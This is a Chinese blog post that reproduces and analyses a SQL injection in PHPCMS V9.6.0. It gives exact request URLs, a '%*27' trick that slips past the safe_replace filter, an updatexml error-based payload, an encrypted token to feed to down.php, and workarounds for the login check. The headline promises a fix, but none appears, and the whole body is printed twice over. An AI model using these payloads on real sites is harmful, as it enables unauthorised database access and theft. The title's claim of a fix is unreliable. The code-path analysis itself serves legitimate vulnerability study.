您现在的位置是:首页 > cms教程 > phpcms教程phpcms教程
PHPCMSV9.6.0SQL注入漏洞分析修复方法示例
石和革2025-05-16 17:32:23phpcms教程已有2人查阅
导读0x01此SQL注入漏洞与metinfo v6.2.0版本以下SQL盲注漏洞个人认为较为相似。且较为有趣,故在此分析并附上exp。
0x01
此SQL注入漏洞与metinfo v6.2.0版本以下SQL盲注漏洞个人认为较为相似。且较为有趣,故在此分析并附上exp。
0x02
首先复现漏洞,环境为:
PHP:5.4.45 + Apache
mysql:5.5.53
PHPCMS:V9.6.0-UTF-8
Microsoft Windows 7 旗舰版 OS 版本: 6.1.7601 Service Pack 1 Build 7601
此漏洞复现分三个步骤:
第一步:获取 siteid
访问:/index.php?m=wap&a=index&siteid=1
可以从返回包中获取siteid的值,以下复现过程个人使用管理员cookie,所以并非使用siteid,siteid值具体作用请查看此文末尾exp,此处不再赘述。
第二步:获取加密后的payload
明文payload:aid=1&src=%26id=1%*27%*20and%*20updatexml%281%2Cconcat%280x7e%2C%28select%*20%40%40version%29%2C0x7e%29%2C1%29%23%26m%3D1%26modelid%3D1%26f%3D1%26catid%3D1
POST访问:/phpcmsv9.6.0/index.php?m=attachment&c=attachments&a=swfupload_json&aid=1&src=%26id=1%*27%*20and%*20updatexml%281%2Cconcat%280x7e%2C%28select%*20%40%40version%29%2C0x7e%29%2C1%29%23%26m%3D1%26modelid%3D1%26f%3D1%26catid%3D1
POST参数:userid_flash=112312313acasdc(随便填写,但不能为空)
此处可以得到加密后的payload
第三步:注入
获取到加密后的payload之后可直接带入程序中,获取所需的数据。
访问:/phpcmsv9.6.0/index.php?m=content&c=down&a=init&a_k=d55eWp8mOkWM7ta1tz2mcrsAJ1CPYLCD3yXSZGWdtn_PqXIgq1bdB3A9EkhHVo5Hr2nLgscNBKBHCws-gP9My5gp2R0ac_90v3Rj3Ghfk6k6khao1XYuy5qg_c4wKvOKhAUhRVFJBIQNmPNmxnk_GNpjskYSgV1nUxCDtkd-N0v-yiMrEWMVaHqjbef4g5zHXGCbSS07hv5XLYr3kUo
注入成功
0x03
漏洞分析:
首先漏洞产生点位于:\phpcms\modules\content\down.php 的 init 函数中
注入点位于第26行:$rs = $this->db->get_one(array('id'=>$id)); 再看get_one函数:
可以看到此处执行SQL语句。那么回过头再看 $id 的来源是否可控。可以看到第17行parse_str函数。此函数作用是取出变量。那么再看$a_k是否可控。可以看到第14行,
$a_k = sys_auth($a_k, 'DECODE', pc_base::load_config('system','auth_key'));
这条语句为解密GET传过来的数据,由此可以想到,如果将加密后的恶意数据通过GET传入,在经过解密,并且没经过任何过滤,直接拼接入SQL语句,由此漏洞产生。
那么此处只需查看sys_auth这个加密函数,看是否可逆。 此函数可以看出,倘若知道 $key 的值,便可逆,否则不可逆。由于此 key 并不固定。于是改变思路,现在需要找到一个将恶意数据加密后的地方,并且可以获取,正好有一处为:set_cookie方法: 此函数倘若 $value 可控,那么 cookie 则可控。于是便有了加密后的 payload。此时全局搜索set_cookie,查找满足条件的地方。可以找到有一个方法:swfupload_json 方法:
此处250行调用了set_cookie方法,查看$json_str是否可控,看到第243行,$json_str 为GET传入的数据。再看safe_replace过滤函数:
可以看到会将GET的数据中 %20 ,%27,%2527等过滤。但是倘若如此构造payload:%*27 将此数据传入,则safe_replace函数会先查找%27并过滤。但此数据没有,在查找*并过滤,于是剩下的数据为%27,绕过成功。于是可以构造payload
明文: 此时传入此可绕过过滤函数的payload并获取加密后的cookie
上图中dwQXH_att_json的值即为加密后的payload。然后获取此payload将起赋值给$a_k。并查看其值:
此时可以看到恶意数据被成功传入。但是在down.php中还有几个条件:
可以看到,$a_k变量中还必须有 $m,$modelid,$catid,$f 等4个变量,否则会出错。于是重新构造payload
明文:aid=1&src=1&id=1' and updatexml(1,concat(0x7e,(select @@version),0x7e),1)#&m=1&modelid=1&catid=1&f=1
urlencode: 获取加密后的payload:
然后传入$a_k变量中。注入成功:
注:获取不到set_cookie的值问题体现在构造函数中:
此处会判断是否登录,由于我是登录后台之后复现,所以没有发现此问题,在此致歉。该问题解决方法为1、登录一次后台。 2、将sys_auth()函数下载到本地,任意加密一个值后,获取加密后的值以POST方法传入userid_flash,这样也会获取到set_cookie的值。
此SQL注入漏洞与metinfo v6.2.0版本以下SQL盲注漏洞个人认为较为相似。且较为有趣,故在此分析并附上exp。
0x02
首先复现漏洞,环境为:
PHP:5.4.45 + Apache
mysql:5.5.53
PHPCMS:V9.6.0-UTF-8
Microsoft Windows 7 旗舰版 OS 版本: 6.1.7601 Service Pack 1 Build 7601
此漏洞复现分三个步骤:
第一步:获取 siteid
访问:/index.php?m=wap&a=index&siteid=1
可以从返回包中获取siteid的值,以下复现过程个人使用管理员cookie,所以并非使用siteid,siteid值具体作用请查看此文末尾exp,此处不再赘述。
第二步:获取加密后的payload
明文payload:aid=1&src=%26id=1%*27%*20and%*20updatexml%281%2Cconcat%280x7e%2C%28select%*20%40%40version%29%2C0x7e%29%2C1%29%23%26m%3D1%26modelid%3D1%26f%3D1%26catid%3D1
POST访问:/phpcmsv9.6.0/index.php?m=attachment&c=attachments&a=swfupload_json&aid=1&src=%26id=1%*27%*20and%*20updatexml%281%2Cconcat%280x7e%2C%28select%*20%40%40version%29%2C0x7e%29%2C1%29%23%26m%3D1%26modelid%3D1%26f%3D1%26catid%3D1
POST参数:userid_flash=112312313acasdc(随便填写,但不能为空)
此处可以得到加密后的payload
第三步:注入
获取到加密后的payload之后可直接带入程序中,获取所需的数据。
访问:/phpcmsv9.6.0/index.php?m=content&c=down&a=init&a_k=d55eWp8mOkWM7ta1tz2mcrsAJ1CPYLCD3yXSZGWdtn_PqXIgq1bdB3A9EkhHVo5Hr2nLgscNBKBHCws-gP9My5gp2R0ac_90v3Rj3Ghfk6k6khao1XYuy5qg_c4wKvOKhAUhRVFJBIQNmPNmxnk_GNpjskYSgV1nUxCDtkd-N0v-yiMrEWMVaHqjbef4g5zHXGCbSS07hv5XLYr3kUo
注入成功
0x03
漏洞分析:
首先漏洞产生点位于:\phpcms\modules\content\down.php 的 init 函数中
注入点位于第26行:$rs = $this->db->get_one(array('id'=>$id)); 再看get_one函数:
可以看到此处执行SQL语句。那么回过头再看 $id 的来源是否可控。可以看到第17行parse_str函数。此函数作用是取出变量。那么再看$a_k是否可控。可以看到第14行,
$a_k = sys_auth($a_k, 'DECODE', pc_base::load_config('system','auth_key'));
这条语句为解密GET传过来的数据,由此可以想到,如果将加密后的恶意数据通过GET传入,在经过解密,并且没经过任何过滤,直接拼接入SQL语句,由此漏洞产生。
那么此处只需查看sys_auth这个加密函数,看是否可逆。 此函数可以看出,倘若知道 $key 的值,便可逆,否则不可逆。由于此 key 并不固定。于是改变思路,现在需要找到一个将恶意数据加密后的地方,并且可以获取,正好有一处为:set_cookie方法: 此函数倘若 $value 可控,那么 cookie 则可控。于是便有了加密后的 payload。此时全局搜索set_cookie,查找满足条件的地方。可以找到有一个方法:swfupload_json 方法:
此处250行调用了set_cookie方法,查看$json_str是否可控,看到第243行,$json_str 为GET传入的数据。再看safe_replace过滤函数:
可以看到会将GET的数据中 %20 ,%27,%2527等过滤。但是倘若如此构造payload:%*27 将此数据传入,则safe_replace函数会先查找%27并过滤。但此数据没有,在查找*并过滤,于是剩下的数据为%27,绕过成功。于是可以构造payload
明文: 此时传入此可绕过过滤函数的payload并获取加密后的cookie
上图中dwQXH_att_json的值即为加密后的payload。然后获取此payload将起赋值给$a_k。并查看其值:
此时可以看到恶意数据被成功传入。但是在down.php中还有几个条件:
可以看到,$a_k变量中还必须有 $m,$modelid,$catid,$f 等4个变量,否则会出错。于是重新构造payload
明文:aid=1&src=1&id=1' and updatexml(1,concat(0x7e,(select @@version),0x7e),1)#&m=1&modelid=1&catid=1&f=1
urlencode: 获取加密后的payload:
然后传入$a_k变量中。注入成功:
注:获取不到set_cookie的值问题体现在构造函数中:
此处会判断是否登录,由于我是登录后台之后复现,所以没有发现此问题,在此致歉。该问题解决方法为1、登录一次后台。 2、将sys_auth()函数下载到本地,任意加密一个值后,获取加密后的值以POST方法传入userid_flash,这样也会获取到set_cookie的值。
本文标签:
很赞哦! (1)
上一篇:PHPCMSV9环境搭建安装教程
下一篇:phpcms缓存文件函数分析
暂无内容 |
暂无内容 |
相关文章
- discuz防止sql注入的方法
- phpcms的/preview.phpSQL注入漏洞修复方法
- phpcms v9.6.0 sql注入漏洞分析
- PHPCMS V9.6.0 SQL注入漏洞EXP使用方法
- PHPCMSv9.6.0wap模块SQL注入漏洞修复方法
- PHPCMS提示\phpcms\modules\member\index.php用户登陆SQL注入漏
- ecshop常见sql注入漏洞修复
- ecshop的sql注入漏洞修复方法实例
- ecshop的sql注入漏洞修复方法
- dedecms织梦防SQL注入防跨站提交的方法
- DedeCMS织梦投票模块插件sql注入漏洞修复教程
- dedecms的SQL注入0day漏洞修复教程
暂无内容 |
暂无内容 |
随机图文
phpcms怎么发布文章?phpcms发布文章步骤教程
phpcms是一款网站管理软件。该软件采用模块化开发,支持多种分类方式,使用它可方便实现个性化网站的设计、开发与维护。phpcms标签参数使用说明
内容模块:content可用操作:lists 内容数据列表relation 内容相关文章hits 内容数据点击排行榜category 内容栏目列表phpcms安装后管理员不存在报错的几种解决方法
phpcms管理员不存在怎么办?phpcmsV9正常安装后,后台管理员不存在phpmyadmin无法打开的解决方法。本地之前安装了java运行环境,包括+mysql,所以再次安装phpcms之后公告模块其中内容直接复制到phpcms文件夹下
该文件夹下有三个文件夹(没有扩展名的皆为文件夹)所有文件内容,按从上到下顺序announce.sql:index.html:model.php:
留言与评论 (共有 0 条评论) |